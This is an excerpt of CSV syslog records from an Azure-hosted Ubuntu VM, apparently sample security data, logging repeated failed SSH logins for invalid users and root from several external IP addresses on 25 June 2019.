+8771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:21,UbuntuDevEnv,2019-06-25 21:56:20,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 51801:11: Bye Bye [preauth],37895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,51801,,
+8772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:54,UbuntuDevEnv,2019-06-25 21:56:53,auth,UbuntuDevEnv,info,Invalid user cou from 165.22.96.224 port 37070,38012,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cou,165.22.96.2,37070,,
+8773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:54,UbuntuDevEnv,2019-06-25 21:56:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,38012,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:54,UbuntuDevEnv,2019-06-25 21:56:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38012,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:56,UbuntuDevEnv,2019-06-25 21:56:55,auth,UbuntuDevEnv,info,Failed password for invalid user cou from 165.22.96.224 port 37070 ssh2,38012,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cou,165.22.96.2,37070,,
+8776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:56,UbuntuDevEnv,2019-06-25 21:56:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=159.203.77.51  user=root,38015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,159.203.77.5,,0,
+8777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:56,UbuntuDevEnv,2019-06-25 21:56:55,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 37070:11: Bye Bye [preauth],38012,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,37070,,
+8778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:56,UbuntuDevEnv,2019-06-25 21:56:55,auth,UbuntuDevEnv,info,Disconnected from invalid user cou 165.22.96.224 port 37070 [preauth],38012,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cou,165.22.96.2,37070,,
+8779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:56,UbuntuDevEnv,2019-06-25 21:56:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.12.159.146  user=root,38028,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,81.12.159.1,,0,
+8780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:58,UbuntuDevEnv,2019-06-25 21:56:58,auth,UbuntuDevEnv,info,Failed password for root from 81.12.159.146 port 48874 ssh2,38028,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.12.159.1,48874,,
+8781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:58,UbuntuDevEnv,2019-06-25 21:56:58,auth,UbuntuDevEnv,info,"Received disconnect from 81.12.159.146 port 48874:11: Normal Shutdown, Thank you for playing [preauth]",38028,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.12.159.1,48874,,
+8782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:58,UbuntuDevEnv,2019-06-25 21:56:58,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 81.12.159.146 port 48874 [preauth],38028,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,81.12.159.1,48874,,
+8783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:59,UbuntuDevEnv,2019-06-25 21:56:58,auth,UbuntuDevEnv,info,Failed password for root from 159.203.77.51 port 44124 ssh2,38015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.203.77.5,44124,,
+8784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:59,UbuntuDevEnv,2019-06-25 21:56:58,auth,UbuntuDevEnv,info,"Received disconnect from 159.203.77.51 port 44124:11: Normal Shutdown, Thank you for playing [preauth]",38015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.203.77.5,44124,,
+8785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:59,UbuntuDevEnv,2019-06-25 21:56:58,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 159.203.77.51 port 44124 [preauth],38015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,159.203.77.5,44124,,
+8786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:57:35,UbuntuDevEnv,2019-06-25 21:57:35,auth,UbuntuDevEnv,info,Invalid user shao from 134.209.233.74 port 53704,38170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shao,134.209.233.7,53704,,
+8787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:57:35,UbuntuDevEnv,2019-06-25 21:57:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,38170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:57:35,UbuntuDevEnv,2019-06-25 21:57:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:57:37,UbuntuDevEnv,2019-06-25 21:57:37,auth,UbuntuDevEnv,info,Failed password for invalid user shao from 134.209.233.74 port 53704 ssh2,38170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shao,134.209.233.7,53704,,
+8790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:57:37,UbuntuDevEnv,2019-06-25 21:57:37,auth,UbuntuDevEnv,info,Disconnected from invalid user shao 134.209.233.74 port 53704 [preauth],38170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shao,134.209.233.7,53704,,
+8791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:57:37,UbuntuDevEnv,2019-06-25 21:57:37,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 53704:11: Bye Bye [preauth],38170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,53704,,
+8792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:57:47,UbuntuDevEnv,2019-06-25 21:57:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114  user=test,38213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,212.156.136.1,,0,
+8793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:57:49,UbuntuDevEnv,2019-06-25 21:57:48,auth,UbuntuDevEnv,info,Failed password for test from 212.156.136.114 port 24412 ssh2,38213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,24412,,
+8794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:57:49,UbuntuDevEnv,2019-06-25 21:57:48,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 24412:11: Bye Bye [preauth],38213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,24412,,
+8795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:57:49,UbuntuDevEnv,2019-06-25 21:57:48,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 212.156.136.114 port 24412 [preauth],38213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,212.156.136.1,24412,,
+8796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:58:08,UbuntuDevEnv,2019-06-25 21:58:08,auth,UbuntuDevEnv,info,Invalid user mbett from 132.232.40.86 port 43950,38282,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mbett,132.232.40.8,43950,,
+8797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:58:08,UbuntuDevEnv,2019-06-25 21:58:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=132.232.40.86,38282,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,132.232.40.8,,0,
+8798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:58:08,UbuntuDevEnv,2019-06-25 21:58:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38282,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:58:10,UbuntuDevEnv,2019-06-25 21:58:09,auth,UbuntuDevEnv,info,Failed password for invalid user mbett from 132.232.40.86 port 43950 ssh2,38282,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mbett,132.232.40.8,43950,,
+8800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:58:10,UbuntuDevEnv,2019-06-25 21:58:10,auth,UbuntuDevEnv,info,Disconnected from invalid user mbett 132.232.40.86 port 43950 [preauth],38282,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mbett,132.232.40.8,43950,,
+8801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:58:10,UbuntuDevEnv,2019-06-25 21:58:10,auth,UbuntuDevEnv,info,Received disconnect from 132.232.40.86 port 43950:11: Bye Bye [preauth],38282,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,132.232.40.8,43950,,
+8802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:58:37,UbuntuDevEnv,2019-06-25 21:58:37,auth,UbuntuDevEnv,info,Invalid user iag from 165.22.96.224 port 55934,38388,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,iag,165.22.96.2,55934,,
+8803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:58:37,UbuntuDevEnv,2019-06-25 21:58:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,38388,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:58:37,UbuntuDevEnv,2019-06-25 21:58:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38388,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:58:39,UbuntuDevEnv,2019-06-25 21:58:39,auth,UbuntuDevEnv,info,Failed password for invalid user iag from 165.22.96.224 port 55934 ssh2,38388,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,iag,165.22.96.2,55934,,
+8806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:58:40,UbuntuDevEnv,2019-06-25 21:58:39,auth,UbuntuDevEnv,info,Disconnected from invalid user iag 165.22.96.224 port 55934 [preauth],38388,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,iag,165.22.96.2,55934,,
+8807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:58:40,UbuntuDevEnv,2019-06-25 21:58:39,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 55934:11: Bye Bye [preauth],38388,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,55934,,
+8808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:59:00,UbuntuDevEnv,2019-06-25 21:58:59,auth,UbuntuDevEnv,info,Invalid user developer from 134.209.233.74 port 42530,38468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,developer,134.209.233.7,42530,,
+8809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:59:00,UbuntuDevEnv,2019-06-25 21:58:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,38468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:59:00,UbuntuDevEnv,2019-06-25 21:58:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:59:02,UbuntuDevEnv,2019-06-25 21:59:01,auth,UbuntuDevEnv,info,Failed password for invalid user developer from 134.209.233.74 port 42530 ssh2,38468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,developer,134.209.233.7,42530,,
+8812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:59:02,UbuntuDevEnv,2019-06-25 21:59:01,auth,UbuntuDevEnv,info,Disconnected from invalid user developer 134.209.233.74 port 42530 [preauth],38468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,developer,134.209.233.7,42530,,
+8813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:59:02,UbuntuDevEnv,2019-06-25 21:59:01,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 42530:11: Bye Bye [preauth],38468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,42530,,
+8814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:59:13,UbuntuDevEnv,2019-06-25 21:59:13,auth,UbuntuDevEnv,info,Invalid user ethos from 212.156.136.114 port 39646,38525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ethos,212.156.136.1,39646,,
+8815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:59:13,UbuntuDevEnv,2019-06-25 21:59:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:59:13,UbuntuDevEnv,2019-06-25 21:59:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,38525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+8817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:59:15,UbuntuDevEnv,2019-06-25 21:59:15,auth,UbuntuDevEnv,info,Failed password for invalid user ethos from 212.156.136.114 port 39646 ssh2,38525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ethos,212.156.136.1,39646,,
+8818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:59:15,UbuntuDevEnv,2019-06-25 21:59:15,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 39646:11: Bye Bye [preauth],38525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,39646,,
+8819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:59:15,UbuntuDevEnv,2019-06-25 21:59:15,auth,UbuntuDevEnv,info,Disconnected from invalid user ethos 212.156.136.114 port 39646 [preauth],38525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ethos,212.156.136.1,39646,,
+8820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:20,UbuntuDevEnv,2019-06-25 22:00:19,auth,UbuntuDevEnv,info,Invalid user nwes from 165.22.96.224 port 45926,38784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nwes,165.22.96.2,45926,,
+8821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:20,UbuntuDevEnv,2019-06-25 22:00:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:20,UbuntuDevEnv,2019-06-25 22:00:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,38784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:22,UbuntuDevEnv,2019-06-25 22:00:22,auth,UbuntuDevEnv,info,Failed password for invalid user nwes from 165.22.96.224 port 45926 ssh2,38784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nwes,165.22.96.2,45926,,
+8824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:23,UbuntuDevEnv,2019-06-25 22:00:22,auth,UbuntuDevEnv,info,Disconnected from invalid user nwes 165.22.96.224 port 45926 [preauth],38784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nwes,165.22.96.2,45926,,
+8825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:23,UbuntuDevEnv,2019-06-25 22:00:22,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 45926:11: Bye Bye [preauth],38784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,45926,,
+8826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:24,UbuntuDevEnv,2019-06-25 22:00:23,auth,UbuntuDevEnv,info,Invalid user cou from 134.209.233.74 port 59588,38799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cou,134.209.233.7,59588,,
+8827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:24,UbuntuDevEnv,2019-06-25 22:00:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,38799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:24,UbuntuDevEnv,2019-06-25 22:00:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:26,UbuntuDevEnv,2019-06-25 22:00:26,auth,UbuntuDevEnv,info,Failed password for invalid user cou from 134.209.233.74 port 59588 ssh2,38799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cou,134.209.233.7,59588,,
+8830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:26,UbuntuDevEnv,2019-06-25 22:00:26,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 59588:11: Bye Bye [preauth],38799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,59588,,
